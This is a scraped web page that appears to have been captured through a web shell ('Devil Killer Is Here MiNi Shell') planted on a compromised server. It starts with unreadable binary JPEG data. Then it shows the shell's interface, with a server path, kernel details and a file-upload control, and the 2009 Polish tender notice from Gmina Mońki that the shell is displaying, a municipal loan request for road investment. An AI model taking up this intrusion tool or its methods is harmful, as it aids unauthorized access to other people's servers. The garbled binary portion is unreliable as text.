JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090909/312210-N-2009.html

<p class="kh_header"><b>Mońki: Udzielenie i obsługa kredytu długoterminowego oraz kredytu krótkoterminowego na sfinansowanie inwestycji pn. Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej.</b><br>
<b>Numer ogłoszenia: 312210 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mońki , ul. Słowackiego 5A, 19-100 Mońki, woj. podlaskie, tel. 085 7162587, faks 085 7162587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.monki.um.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa kredytu długoterminowego oraz kredytu krótkoterminowego na sfinansowanie inwestycji pn. Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Udzielenie i obsługa kredytu długoterminowego w wysokości 4 122 718,00 zł (słownie: cztery miliony sto dwadzieścia dwa tysiące siedemset osiemnaście złotych) oraz kredytu krótkoterminowego w wysokości 2 630 000,00 zł. (słownie: dwa miliony sześćset trzydzieści tysięcy złotych) na sfinansowanie inwestycji Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej.
1. rodzaj kredytu : długoterminowy i krótkoterminowy 
2. waluta kredytu: złoty polski, 
3. uruchomienie kredytu nastąpi:
I - transza w wysokości 4 112 718,00 do dnia 15.10.2009 r.
II transza w wysokości 2 630 000,00 do dnia 15.10.2009 r.
4. okres kredytowania : od dnia uruchomienia I transzy do 31.12.2014 r.
5. karencja w spłacie kredytu długoterminowego do 31.03.2010 r.
6. okres kredytowania: od dnia uruchomienia II transzy do 28.02.2010 r.
7. karencja w spłacie kredytu krótkoterminowego do 31.12.2009 r. - 2 097 000,00 zł
do 28.02.2010 r. - 533 000,00 zł
8. kredyt długoterminowy w złotych polskich spłacany będzie w kwartalnych okresach rozliczeniowych w ostatnim dniu każdego kwartału kalendarzowego w wysokości i terminach zgodnie z harmonogramem stanowiącym zał. nr 3 do SIWZ
9. kredyt krótkoterminowy w złotych polskich spłacany będzie w kwartalnych okresach rozliczeniowych w ostatnim dniu każdego kwartału kalendarzowego w wysokości i terminach zgodnie z harmonogramem stanowiącym zał. nr 4 do SIWZ
    Jeżeli termin przypada na dzień wolny od pracy, płatność przypada w pierwszy dzień roboczy po terminie płatności. W przypadku zagrożenia płynności finansowej Zamawiającego spowodowanego przez zwiększone wydatki na usunięcie skutków klęsk żywiołowych lub innej podobnej okoliczności lub załamaniem dochodów budżetu przez pogorszenie sytuacji gospodarczej, strony dopuszczają możliwość przedłużenia terminu spłaty kredytu o czas oznaczony, zmniejszenie wysokości rat kwartalnych oraz czasowe zawieszenie spłaty kredytu. Powyższa zmiana wymaga formy pisemnej i może być dokonana jedynie przed upływem okresu kredytowania określonego w umowie. Z tytułu przedłużenia spłaty kredytu oprocentowanie kredytu będzie naliczane na zasadach zaproponowanych w ofercie. Z tytułu przesunięcia terminu spłaty, zmniejszenia wysokości rat kwartalnych oraz czasowego zawieszenia spłaty kredytu wykonawca nie będzie pobierał żadnych dodatkowych prowizji i opłat.
10. oprocentowanie kredytów zmienne w stosunku rocznym oparte o stawkę WIBOR 3M z ostatniego roboczego dnia miesiąca poprzedzającego okres rozliczeniowy powiększoną lub pomniejszoną o marżę Banku -kredytodawcy, która będzie stała przez cały okres trwania umowy,
11. odsetki będą naliczane od niespłaconego kapitału przy zastosowaniu kalendarza rzeczywistego i spłacane będą w również okresach kwartalnych analogicznie jak raty kapitałowe,
12. Zamawiający określa jako możliwą formę zabezpieczenia kredytu weksel własny in blanco,
13. dopuszcza się możliwość uruchomienia mniejszej kwoty kredytu oraz jego wcześniejszą spłatę, przy czym Wykonawca nie będzie doliczał dodatkowych opłat ani prowizji.
14. Wykonawca nie będzie pobierał w związku z realizacją niniejszego zamówienia
jakichkolwiek dodatkowych opłat lub prowizji poza określonymi w treści oferty.
15. Zamawiający nie będzie  ponosił  żadnych kosztów z tytułu przekazania poszczególnych transz na jego konto..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  zamówienie mogą ubiegać się Wykonawcy, którzy:
1) spełnią warunki określone w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Z 2007 r., Nr 223, poz. 1655 ze zm.)
2) nie podlegają wykluczeniu z postępowania na podstawie art.24 ust 1 i 2 ustaw z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 ze zm.)
3) spełnią wymogi specyfikacji istotnych warunków zamówienia
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o dokumenty wymagane w rozdziale VII niniejszej SIWZ metodą spełnia/nie spełnia z zastrzeżeniem art.26 ust.3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na ofertę składają się następujące dokumenty i załączniki:
a) formularz oferty - wypełniony i podpisany przez Wykonawcę wraz z załącznikami (zał. nr 1 do SIWZ),
b) pełnomocnictwo - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo z zaświadczenia o wpisie do ewidencji działalności gospodarczej.
2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawo zamówień publicznych składa następujące oświadczenia i dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu  określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  - zał. Nr 2 do SIWZ
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana metodą spełnia/ nie spełnia na podstawie złożonych przez Wykonawców a wymaganych przez Zamawiającego dokumentów lub oświadczeń.  
3. Wykonawca mający siedzibę lub zamieszkały poza terytorium Rzeczpospolitej Polskiej:
a) zamiast dokumentu, o których mowa w rozdziale VII pkt 2 lit. a) siwz  składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
-  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale VII pkt 3 siwz, zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w rozdziale VII pkt 3siwz.
4.  Wykonawcy wspólnie ubiegający się o zamówienie:
a) ponoszą solidarną odpowiedzialność za wykonanie lub nienależyte wykonanie zamówienia,
b) zobowiązani są do ustanowienia pełnomocnika, ofertę podpisuje pełnomocnik
c) do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarciu umowy,
d) pełnomocnictwo musi mieć formę pisemną, 
e) wszelka korespondencja prowadzona będzie z pełnomocnikiem;
f)  oferta winna zawierać dokumenty określone w rozdziale VII pkt 2 lit. a)  siwz  dla każdego partnera z osobna; pozostałe dokumenty składane są wspólnie,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.monki.um.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mońkach ul. Słowackiego 5a, 19-100 Mońki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2009 godzina 08:45, miejsce: Urząd Miejski w Mońkach ul. Słowackiego 5a, 19-100 Mońki, pok. 114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com